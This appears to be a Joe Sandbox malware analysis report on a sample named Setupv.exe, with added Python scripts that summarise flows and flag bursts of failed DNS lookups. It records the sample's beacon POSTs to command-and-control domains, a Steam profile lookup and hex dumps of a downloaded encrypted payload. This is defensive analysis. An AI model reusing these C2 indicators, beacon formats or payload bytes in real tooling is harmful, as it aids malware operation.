Apr 28, 2025 19:34:50.082580090 CEST | 53 | 59371 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:50.084494114 CEST | 63921 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:50.241004944 CEST | 53 | 63921 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:50.242688894 CEST | 59576 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:50.598680019 CEST | 53 | 59576 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:50.600178957 CEST | 65305 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:50.751776934 CEST | 53 | 65305 | 1.1.1.1 | 192.168.2.5
Apr 28, 2025 19:34:51.571799994 CEST | 54451 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:51.743921041 CEST | 53 | 54451 | 1.1.1.1 | 192.168.2.5
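The packet tables above list one row per packet, which hides the shape of the traffic: the sandbox host 192.168.2.5 opens three successive TLS connections to 104.21.36.133:443 (client ports 49702, 49703 and 49704, about a second apart) and exchanges short query/answer pairs with 1.1.1.1:53. The script below is an added example written for this page, not part of the Joe Sandbox report, that collapses such rows into flows. It reads rows written one packet per line as `timestamp | src port | dst port | src IP | dst IP` (the column order of the tables above); the embedded sample rows are transcribed from those tables. The rule that the endpoint with the lower port is the server is an assumption that holds for this capture but not for every protocol.

```python
import re
from datetime import datetime

# Constructed sample: rows transcribed from the report's TCP and UDP packet tables,
# written as "timestamp | src port | dst port | src IP | dst IP" (one packet each).
SAMPLE_ROWS = """
Apr 28, 2025 19:34:59.247951031 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:34:59.248918056 CEST | 443 | 49702 | 104.21.36.133 | 192.168.2.5
Apr 28, 2025 19:34:59.673238039 CEST | 49702 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:00.889539957 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.666146994 CEST | 49703 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:03.800678968 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:04.669569969 CEST | 49704 | 443 | 192.168.2.5 | 104.21.36.133
Apr 28, 2025 19:35:05.247796059 CEST | 49695 | 443 | 192.168.2.5 | 172.67.182.68
Apr 28, 2025 19:34:28.271243095 CEST | 50046 | 53 | 192.168.2.5 | 1.1.1.1
Apr 28, 2025 19:34:28.478075981 CEST | 53 | 50046 | 1.1.1.1 | 192.168.2.5
"""

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")


def parse_timestamp(text):
    """Parse 'Apr 28, 2025 19:34:59.247951031 CEST'. The report carries
    nanoseconds; datetime keeps microseconds, so the fraction is truncated.
    The zone token is dropped (every row of one report shares it)."""
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base, frac = m.groups()
    micros = int(frac[:6].ljust(6, "0"))
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(microsecond=micros)


def flow_key(sport, dport, sip, dip):
    """Canonical (client_ip, client_port, server_ip, server_port) for a packet.
    Assumption: the endpoint with the lower port is the server, which holds for
    this capture (443 and 53 against ephemeral ports above 49152)."""
    if sport < dport:
        return (dip, dport, sip, sport)
    return (sip, sport, dip, dport)


def summarize_flows(rows_text):
    """Collapse per-packet rows into flows with per-direction packet counts
    and first/last timestamps. Header or malformed lines are skipped."""
    flows = {}
    for line in rows_text.strip().splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 5 or not parts[1].isdigit():
            continue
        ts = parse_timestamp(parts[0])
        sport, dport, sip, dip = int(parts[1]), int(parts[2]), parts[3], parts[4]
        key = flow_key(sport, dport, sip, dip)
        f = flows.setdefault(key, {"packets": 0, "client_to_server": 0,
                                   "server_to_client": 0, "first": ts, "last": ts})
        f["packets"] += 1
        f["client_to_server" if sip == key[0] else "server_to_client"] += 1
        f["first"] = min(f["first"], ts)
        f["last"] = max(f["last"], ts)
    return flows


def flows_to_server(flows, server_ip, server_port):
    """Flow keys that terminate at one server endpoint, ordered by client port."""
    return sorted(k for k in flows if k[2] == server_ip and k[3] == server_port)


def duration_seconds(flow):
    return (flow["last"] - flow["first"]).total_seconds()


if __name__ == "__main__":
    flows = summarize_flows(SAMPLE_ROWS)
    for key in sorted(flows, key=lambda k: flows[k]["first"]):
        f = flows[key]
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  packets={f['packets']} "
              f"(c2s={f['client_to_server']}, s2c={f['server_to_client']}) "
              f"duration={duration_seconds(f):.3f}s")
```

Run against the full tables, the three flows to 104.21.36.133:443 stand out as back-to-back connections to the same server while the DNS flows stay at two packets each; that is the view to carry into the HTTPS and DNS sections rather than the raw packet list.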
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 28, 2025 19:34:28.271243095 CEST | 192.168.2.5 | 1.1.1.1 | 0xd5ad | Standard query (0) | transdataa.digital | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:48.826594114 CEST | 192.168.2.5 | 1.1.1.1 | 0xc121 | Standard query (0) | geographys.run | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.001962900 CEST | 192.168.2.5 | 1.1.1.1 | 0x5da5 | Standard query (0) | woodpeckersd.run | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.176939011 CEST | 192.168.2.5 | 1.1.1.1 | 0x3897 | Standard query (0) | tropiscbs.live | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.338097095 CEST | 192.168.2.5 | 1.1.1.1 | 0x27c4 | Standard query (0) | cartograhphy.top | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.494621038 CEST | 192.168.2.5 | 1.1.1.1 | 0x1b0d | Standard query (0) | biosphxere.digital | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.655128002 CEST | 192.168.2.5 | 1.1.1.1 | 0x9b31 | Standard query (0) | topographky.top | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.084494114 CEST | 192.168.2.5 | 1.1.1.1 | 0x8299 | Standard query (0) | climatologfy.top | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.242688894 CEST | 192.168.2.5 | 1.1.1.1 | 0x65de | Standard query (0) | vigorbridgoe.top | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.600178957 CEST | 192.168.2.5 | 1.1.1.1 | 0xf3fa | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:51.571799994 CEST | 192.168.2.5 | 1.1.1.1 | 0xe28d | Standard query (0) | toptalentw.top | A (IP address) | IN (0x0001) | false
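Between 19:34:48 and 19:34:51 the sample resolves ten unrelated-looking names on .run, .live, .top and .digital, one every 150 to 400 ms, and the answer table that follows shows six of them coming back as Name error (3). A single host burning through many distinct domains that do not exist, in under a few seconds, is a DNS-level signal worth alerting on independently of which family produced it: it is consistent with a stealer walking a configured domain list until one resolves. The script below is an added example written for this page, not code from the report or from the sample, that pairs queries with answers by DNS transaction ID and raises an alert when one client collects NXDOMAIN answers for five or more distinct domains inside a five-second window. The sample records are transcribed from the report's query and answer tables (only names whose answer appears in the report are included); the thresholds and the two-label registrable-domain rule are assumptions, not values from the page.

```python
from collections import defaultdict
from datetime import datetime, timedelta

NXDOMAIN = 3  # DNS RCODE 3, shown as "Name error (3)" in the report

# Constructed sample transcribed from the report's DNS query table:
# (timestamp, client IP, transaction ID, queried name)
QUERIES = [
    ("Apr 28, 2025 19:34:28.271243", "192.168.2.5", 0xd5ad, "transdataa.digital"),
    ("Apr 28, 2025 19:34:48.826594", "192.168.2.5", 0xc121, "geographys.run"),
    ("Apr 28, 2025 19:34:49.001962", "192.168.2.5", 0x5da5, "woodpeckersd.run"),
    ("Apr 28, 2025 19:34:49.176939", "192.168.2.5", 0x3897, "tropiscbs.live"),
    ("Apr 28, 2025 19:34:49.338097", "192.168.2.5", 0x27c4, "cartograhphy.top"),
    ("Apr 28, 2025 19:34:49.494621", "192.168.2.5", 0x1b0d, "biosphxere.digital"),
    ("Apr 28, 2025 19:34:49.655128", "192.168.2.5", 0x9b31, "topographky.top"),
]
# Constructed sample transcribed from the report's DNS answer table:
# (transaction ID, reply code, answered name)
ANSWERS = [
    (0xd5ad, 0, "transdataa.digital"),
    (0xc121, NXDOMAIN, "geographys.run"),
    (0x5da5, NXDOMAIN, "woodpeckersd.run"),
    (0x3897, NXDOMAIN, "tropiscbs.live"),
    (0x27c4, NXDOMAIN, "cartograhphy.top"),
    (0x1b0d, NXDOMAIN, "biosphxere.digital"),
    (0x9b31, NXDOMAIN, "topographky.top"),
]


def join_queries_answers(queries, answers):
    """Pair each query with its answer on (transaction ID, name); the ID is the
    16-bit header field the resolver echoes back. Unanswered queries keep
    rcode None. Returns (ts, client, name, rcode) sorted by time."""
    by_id = {(txid, name.lower()): rcode for txid, rcode, name in answers}
    events = []
    for ts_text, client, txid, name in queries:
        ts = datetime.strptime(ts_text, "%b %d, %Y %H:%M:%S.%f")
        events.append((ts, client, name, by_id.get((txid, name.lower()))))
    return sorted(events, key=lambda e: e[0])


def registrable(name):
    """Assumption: the last two labels are the registrable domain. A real
    deployment would consult the public suffix list (co.uk and similar)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def nxdomain_bursts(events, window=timedelta(seconds=5), threshold=5):
    """Sliding window per client over NXDOMAIN answers. Reports the widest set
    of distinct registrable domains that failed inside `window` once it
    reaches `threshold`. Returns [(client, first_ts, last_ts, [domains])]."""
    per_client = defaultdict(list)
    for ts, client, name, rcode in events:
        if rcode == NXDOMAIN:
            per_client[client].append((ts, registrable(name)))
    alerts = []
    for client, hits in per_client.items():
        hits.sort()
        best, start = None, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = sorted({d for _, d in hits[start:end + 1]})
            if len(distinct) >= threshold and (best is None or len(distinct) > len(best[2])):
                best = (hits[start][0], hits[end][0], distinct)
        if best is not None:
            alerts.append((client, *best))
    return alerts


if __name__ == "__main__":
    for client, first, last, domains in nxdomain_bursts(join_queries_answers(QUERIES, ANSWERS)):
        span = (last - first).total_seconds()
        print(f"{client}: {len(domains)} NXDOMAIN domains in {span:.3f}s: {', '.join(domains)}")
```

Joining on transaction ID rather than on name alone matters when a client retries the same name; the reply code belongs to a specific query. Tune the threshold against your own resolver logs: browsers and some CDNs also produce NXDOMAIN bursts, but rarely five distinct second-level domains on new TLDs from one process within a second.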
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 28, 2025 19:34:09.525156975 CEST | 1.1.1.1 | 192.168.2.5 | 0xa528 | No error (0) | c.pki.goog | pki-goog.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 28, 2025 19:34:09.525156975 CEST | 1.1.1.1 | 192.168.2.5 | 0xa528 | No error (0) | pki-goog.l.google.com | | 192.178.49.195 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:28.478075981 CEST | 1.1.1.1 | 192.168.2.5 | 0xd5ad | No error (0) | transdataa.digital | | 172.67.182.68 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:28.478075981 CEST | 1.1.1.1 | 192.168.2.5 | 0xd5ad | No error (0) | transdataa.digital | | 104.21.32.16 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:48.990664005 CEST | 1.1.1.1 | 192.168.2.5 | 0xc121 | Name error (3) | geographys.run | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.167403936 CEST | 1.1.1.1 | 192.168.2.5 | 0x5da5 | Name error (3) | woodpeckersd.run | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.336050987 CEST | 1.1.1.1 | 192.168.2.5 | 0x3897 | Name error (3) | tropiscbs.live | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.492019892 CEST | 1.1.1.1 | 192.168.2.5 | 0x27c4 | Name error (3) | cartograhphy.top | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:49.653400898 CEST | 1.1.1.1 | 192.168.2.5 | 0x1b0d | Name error (3) | biosphxere.digital | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.082580090 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b31 | Name error (3) | topographky.top | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.241004944 CEST | 1.1.1.1 | 192.168.2.5 | 0x8299 | Name error (3) | climatologfy.top | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.598680019 CEST | 1.1.1.1 | 192.168.2.5 | 0x65de | Name error (3) | vigorbridgoe.top | none | none | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:50.751776934 CEST | 1.1.1.1 | 192.168.2.5 | 0xf3fa | No error (0) | steamcommunity.com | | 23.52.218.12 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:51.743921041 CEST | 1.1.1.1 | 192.168.2.5 | 0xe28d | No error (0) | toptalentw.top | | 104.21.36.133 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 19:34:51.743921041 CEST | 1.1.1.1 | 192.168.2.5 | 0xe28d | No error (0) | toptalentw.top | | 172.67.194.111 | A (IP address) | IN (0x0001) | false
• transdataa.digital
• steamcommunity.com
• toptalentw.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49695 | 172.67.182.68 | 443 | 7840 | C:\Users\user\Desktop\Setupv.exe
Timestamp, bytes transferred, direction, data:
2025-04-28 17:34:28 UTC, 267 bytes, OUT:
POST /xwpa HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 57
Host: transdataa.digital
2025-04-28 17:34:28 UTC, 57 bytes, OUT:
Data Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d
Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=
2025-04-28 17:34:48 UTC, 243 bytes, IN:
HTTP/1.1 522 <none>
Date: Mon, 28 Apr 2025 17:34:48 GMT
Content-Length: 0
Connection: keep-alive
Server: cloudflare
Cache-Control: private, no-store
Cf-Cache-Status: DYNAMIC
CF-RAY: 93784f876e61475d-DFW
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49698 | 23.52.218.12 | 443 | 7840 | C:\Users\user\Desktop\Setupv.exe
Timestamp, bytes transferred, direction, data:
2025-04-28 17:34:51 UTC, 94 bytes, OUT:
GET /profiles/76561199845513035 HTTP/1.1
Connection: Keep-Alive
Host: steamcommunity.com
2025-04-28 17:34:51 UTC, 1460 bytes, IN:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49699 | 104.21.36.133 | 443 | 7840 | C:\Users\user\Desktop\Setupv.exe
Timestamp, bytes transferred, direction, data:
2025-04-28 17:34:52 UTC, 263 bytes, OUT:
POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 57
Host: toptalentw.top
2025-04-28 17:34:52 UTC, 57 bytes, OUT:
Data Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d
Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=
2025-04-28 17:34:52 UTC, 249 bytes, IN:
HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:34:52 GMT
Content-Type: application/octet-stream
Content-Length: 33581
Connection: keep-alive
Server: cloudflare
Cf-Cache-Status: DYNAMIC
CF-RAY: 937850184a0247fd-DFW
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: c8 d7 39 a1 88 a8 32 4c 55 49 b1 a7 32 ea b1 55 2a f4 34 e0 30 14 7f 3a 5f e3 50 8f 2e d1 4b 06 f9 0d d8 1f fd eb a3 2c b9 6b 70 af 38 b8 15 63 58 2e da a4 97 3d ac 99 de 6f aa 86 6f 62 9c fc 8a e7 bc 80 ce 5c 24 b3 7f 1d e5 5a a8 8a b5 cf ad 28 98 33 6e 03 b1 7d 1c a7 a6 c8 e2 d5 92 0f 73 6e a8 29 97 c7 3a 8a 34 c2 7e ae a2 ef c7 2e 7e 62 3c 57 cc c1 d4 bb 27 bd fa c5 a5 1e 30 19 52 e5 89 5c d9 37 91 26 72 32 71 80 cc d8 6c 3b 4a b7 05 c8 1c 3c 4c a4 6c c1 9e ae 95 e3 03 d5 e0 07 a0 38 ef 8a 00 24 96 14 df e5 fd 07 44 28 38 5a 50 86 fa fa fb ba de 2c da c3 27 87 ed e0 dc 07 29 c1 16 47 e4 fe f9 8f 92 90 ed 8f 4a 5c 79 8b 2f 84 17 fd b8 7a d8 22 bc 36 1e 5d 87 85 b3 b6 79 29 c5 38 c6 d8 5c 5f 1c 28 96 25 86 73 92 ea 1b 95 73 ce 37 48 80 a8 14 0a 6e 5c 20
                                                                                                                                                                                                                          Data Ascii: 92LUI2U*40:_P.K,kp8cX.=oob\$Z(3n}sn):4~.~b<W'0R\7&r2ql;J<Ll8$D(8ZP,')GJ\y/z"6]y)8\_(%ss7Hn\
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: b5 45 39 8f 06 bb 67 19 42 fa b5 5a 27 a6 18 b7 64 90 65 9b 2a 63 47 69 b9 0b 6a 48 ae 27 c6 a0 07 74 a0 bf 93 63 7f dc 04 1d 15 6d 8e 4f 8d ab 23 c3 0d 2a 2f 38 37 90 d8 f8 74 c6 51 cf ea c0 75 7d 43 6d 59 70 d1 85 e4 c6 e7 91 6d 2f 11 76 3d 90 6a e7 01 27 2b 91 cd 8c 03 d3 46 9a 84 8b 9b 10 fe 40 8f 45 c8 20 e1 5e c4 36 a6 21 a0 eb f9 6d 50 ff 21 ba 5b e1 97 23 b4 b2 a3 fe 4d 5a 2d b7 bd b1 be b1 5c 93 c0 df 27 92 29 5b 3d 46 b7 6a f8 9c dd a5 cd af df c7 0a 21 9a 74 69 d2 ff c7 f7 07 fe 2c ce 32 0c 83 c7 ef 39 69 0d a0 ce e5 03 32 b6 7c b3 e5 bb 90 36 39 d7 87 8a 99 ed 7f b7 5f 3b 87 59 82 76 46 b7 bb 5b 7b d4 09 41 61 40 ad 87 fa 06 9e e4 b0 98 8e 25 79 f5 dc 35 0b 4a f8 69 5a 3e 35 f5 02 cb 00 3a 07 92 ed 8a ca 9a 6d 1c 36 e2 1f 5c 7e b2 f7 35 d2 69
                                                                                                                                                                                                                          Data Ascii: E9gBZ'de*cGijH'tcmO#*/87tQu}CmYpm/v=j'+F@E ^6!mP![#MZ-\')[=Fj!ti,29i2|69_;YvF[{Aa@%y5JiZ>5:m6\~5i
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 60 af c2 f3 7c 2f ed e0 72 64 70 8c c4 eb 42 41 94 de 10 0b 45 eb b1 6b ad 17 dc 8f ca c2 57 68 d4 ac 2e 93 12 3a 08 38 b1 fa 02 a5 55 95 f1 fd 3f 12 84 43 7b 70 02 8e 3c d5 08 16 d7 20 99 02 63 62 b5 f7 03 1f df d5 85 47 c3 ad 93 ac f1 9c 9e 69 9e 50 88 5a c3 c4 c9 74 0f 0a 89 74 6b 11 67 a9 18 e8 c6 a8 f5 00 aa 84 83 60 fd f0 7f 15 f2 82 1d e4 3e e0 ce ba 38 1b c0 fc bc 0d 21 ca 55 e1 ed 8d e5 45 c8 76 26 59 e8 b8 bc d3 fc 11 2d 32 7f d9 67 89 c2 18 26 fd 8d 0c ff 36 c3 08 bd 1f 4e f4 76 90 47 41 ca 62 3c a5 31 13 e9 7d 8e e5 da 63 cc 07 26 07 90 ba 99 c9 ab 4a 35 59 36 87 a6 96 52 1c 2d 6b 86 49 65 c5 09 3d aa c0 6b 9e 40 59 86 00 1d 40 2f b2 47 c6 d5 79 39 16 a8 e3 12 99 c6 29 04 ca 7d 83 1a 44 f3 23 1a 3d 97 bd e7 a2 87 95 d6 57 8a 53 b7 10 2b 8c 5d
                                                                                                                                                                                                                          Data Ascii: `|/rdpBAEkWh.:8U?C{p< cbGiPZttkg`>8!UEv&Y-2g&6NvGAb<1}c&J5Y6R-kIe=k@Y@/Gy9)}D#=WS+]
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC847INData Raw: ae 45 b7 f3 fa 2e 6c c1 9d 52 9a fa d7 a4 60 ba 96 22 c5 fc 9c 35 de 19 de ce fa 8c 4d 27 17 23 7f f9 a3 93 0a 8c 5c 06 ae bf 9e 4f f2 b5 8d 17 4a ae d0 b1 57 07 11 41 3c 18 67 14 56 27 6c 0d 74 3e 1f ec 5f 4b 9e ac a8 49 3e 6d 3a 60 6b b5 82 20 a0 87 52 bf 67 87 b6 6f 0c 87 b1 dc 06 0d ac 73 53 0d 61 3f a7 ce 9b 28 b9 98 64 24 53 a7 fd 57 ef 2a 04 b5 79 29 7f 6b eb 4f d8 fb 9d 68 df 2e 00 14 08 43 a8 68 36 43 fe b1 af bb d6 99 23 22 37 77 06 d2 f1 a9 2e 5e 8c 51 00 54 b5 9f 74 2e c8 b4 53 a1 2f 8d 12 db d8 49 f4 61 a8 d4 56 54 7a bf 19 92 53 fd 51 a0 34 b8 cd 91 69 ad 92 eb 50 44 76 d6 e7 40 7b f8 2d ba ad 2c 91 f2 86 13 6e 9a 94 5e af e7 09 ca 36 88 46 55 bc 52 df 8a e5 93 df 0e 4b ab f3 f8 58 17 b8 59 4d 90 31 15 69 f3 e0 95 da bd d5 5d 84 b4 8f 77 24
                                                                                                                                                                                                                          Data Ascii: E.lR`"5M'#\OJWA<gV'lt>_KI>m:`k RgosSa?(d$SW*y)kOh.Ch6C#"7w.^QTt.S/IaVTzSQ4iPDv@{-,n^6FURKXYM1i]w$
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: a4 97 29 bf fe ad f4 5e 5d 51 ae 5e e4 8b 3f 35 64 39 8a f6 3e 38 4d 57 b0 33 1d 1d 71 28 a8 47 b6 23 c8 32 43 93 ff b0 fe c1 d8 3a 29 40 f3 97 4b 59 48 ee 36 8d 5d 04 73 9c 90 0e 5f b6 7f 49 16 4f 66 de 72 87 14 7f c7 6d a7 97 e1 77 a9 37 bd 98 00 bc ec 4f 30 87 16 29 8c ad 61 4b 65 af c2 c7 fc 45 0b 72 a2 e2 1d 44 12 a0 15 bd e6 25 91 d1 7d 42 01 61 10 09 1c bc 18 40 51 19 9b ce 52 1e e2 13 f5 94 bc 7f 42 cd 22 8b fe bd 9b 38 1a 13 e5 07 a2 59 c2 7a 29 74 3c b8 94 51 28 e1 21 b3 6a 5c 93 78 ce 5c b8 91 b0 09 4a ad 50 7f 1e c2 1f e2 c2 4f 3a 54 6a f1 e3 5d f7 e9 40 b5 c0 a7 38 11 55 28 2c 6d d7 29 f9 2b 90 08 89 2a b8 c0 72 78 32 c5 14 19 d0 45 80 22 78 dd c1 c0 8e f4 12 83 7a 41 ac 9f ff bb 12 8c f0 4f c6 65 f0 ee a2 1d 9a df c3 5f 66 e7 f0 2e 19 24 22
                                                                                                                                                                                                                          Data Ascii: )^]Q^?5d9>8MW3q(G#2C:)@KYH6]s_IOfrmw7O0)aKeErD%}Ba@QRB"8Yz)t<Q(!j\x\JPO:Tj]@8U(,m)+*rx2E"xzAOe_f.$"
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 8c 9f 2c bb cf 07 10 08 19 86 f2 af 1c 1d 79 dc ac c1 c6 f8 eb d0 6e 37 a7 45 49 61 02 7b dd dc 37 64 8d 10 27 dd bb 04 c1 b4 b2 50 94 30 79 e3 74 b7 37 1b 39 69 97 88 ac 53 ed 2c 2d cd d3 ed 7b 68 82 19 5c 51 29 cb 11 9f 60 a6 77 de 62 33 a1 97 6c a5 f2 89 89 0b 39 e6 a2 29 2f e0 d0 7a 15 14 05 a2 f2 71 f4 41 fa 39 80 5d a0 78 02 00 10 8a b4 d5 29 b5 92 2e d1 5e 48 8f ea 30 fe 88 92 e7 41 5b 01 06 d8 d0 43 a2 8e 8e 05 02 d6 d3 83 86 99 66 6e f9 c8 21 bf 5a 06 cf ac 99 fb ba a8 1a 2d de 10 bd 84 be 70 ca dd 04 33 18 6a e5 4c 43 3e d9 bf c6 b6 13 1b 15 82 9c 22 18 fc 18 2a d0 76 43 0e b0 04 9d e1 0e 96 96 4d 84 ef 82 98 be 43 d6 9a 8e de 4a c3 07 c1 8e e3 9e ff 46 fc c2 37 87 37 a1 2e 79 b3 c8 8c 2a 53 6f aa 9b d9 99 a9 0e 34 15 68 4f 56 aa 53 66 81 0a b3
                                                                                                                                                                                                                          Data Ascii: ,yn7EIa{7d'P0yt79iS,-{h\Q)`wb3l9)/zqA9]x).^H0A[Cfn!Z-p3jLC>"*vCMCJF77.y*So4hOVSf
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 89 da 43 ef 03 13 85 93 a9 4f c7 91 d6 b4 ad b6 4b d5 d7 3c 5f 1e 11 fb 5b ae 0f 1f bd 6a a5 30 de 47 41 4a 17 4e 7c 1e a7 b1 d7 22 2d de 8d 3f 49 00 11 f0 c3 99 bb b1 e0 66 fc 2a fa 3b df 19 b8 39 f1 53 8f 65 5a 2f b5 37 46 ac 30 6c 1a 1d 1f 2f e6 f7 cf b3 17 58 36 11 76 fd df 79 59 f2 95 5d 4f 22 00 56 b8 3a 7e e8 f1 82 20 7c 84 22 14 3d a3 c9 b8 8e 94 cd 5d d1 62 9a 89 78 35 19 5e 83 18 e4 f1 1d 85 11 83 3e b6 38 ca fb 65 53 9c 24 41 c1 87 9c 74 4e 75 93 0f 20 c5 12 3d e3 1c d5 f3 c5 53 4e 92 83 5b de 4e 07 30 29 47 ce 47 8d e2 8e f1 1b 9e 5d 55 d3 8a e4 64 db 98 57 9a 61 32 9c c4 7f 3d 5c d6 b7 1f 00 c1 e3 b7 23 f5 18 ea 12 61 85 d9 f9 b3 2d a0 ff 3e 6c 22 45 66 bb d7 84 01 d3 d0 0e 7a e3 7d 92 32 36 15 76 14 36 5d 67 b4 4c 73 99 66 39 b6 3e 8c 19 19
                                                                                                                                                                                                                          Data Ascii: COK<_[j0GAJN|"-?If*;9SeZ/7F0l/X6vyY]O"V:~ |"=]bx5^>8eS$AtNu =SN[N0)GG]UdWa2=\#a->l"Efz}26v6]gLsf9>
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 1e d5 1e 3b f3 60 73 17 fa 94 ac 2a 27 c8 10 a3 5c 59 9f 67 6c 9f 29 ae 64 31 2a a7 ad 9d 3a 3d 65 49 da b7 df 49 af 0e ee 09 f1 e5 74 11 9e 8a b2 0a b6 60 bd 04 8f b7 64 94 df c1 04 b5 47 57 73 f2 9c 30 cb ca aa a1 16 ea 97 b7 7e 8f 97 ba e1 fe de b9 a1 e5 23 64 b8 89 a9 e7 ee 3e 09 34 07 04 4d 29 66 23 4d c5 73 49 f0 e7 54 4b c2 4e b8 af 75 90 cd b7 cb a8 d3 0a 97 a5 d0 b9 85 52 01 b0 a6 56 17 f9 a7 f3 e3 97 b0 b8 7b 18 9b f7 dc 49 1c d0 8f 12 0c 07 8d 83 f7 41 64 4c 41 cf 79 09 6c 45 7d 30 89 73 68 dd 45 02 28 03 38 c6 b3 fe 5b 73 e2 c2 bb 99 9e 6c 59 3b e2 b4 c6 f6 30 99 db 4b 99 4a 9e 52 38 b9 86 e1 1e af a7 47 1c d5 1b 54 70 04 6e d7 29 9a ea a5 bf 57 0f f5 e9 f8 07 75 fa 79 4f 7b f6 00 41 4c 61 d5 c3 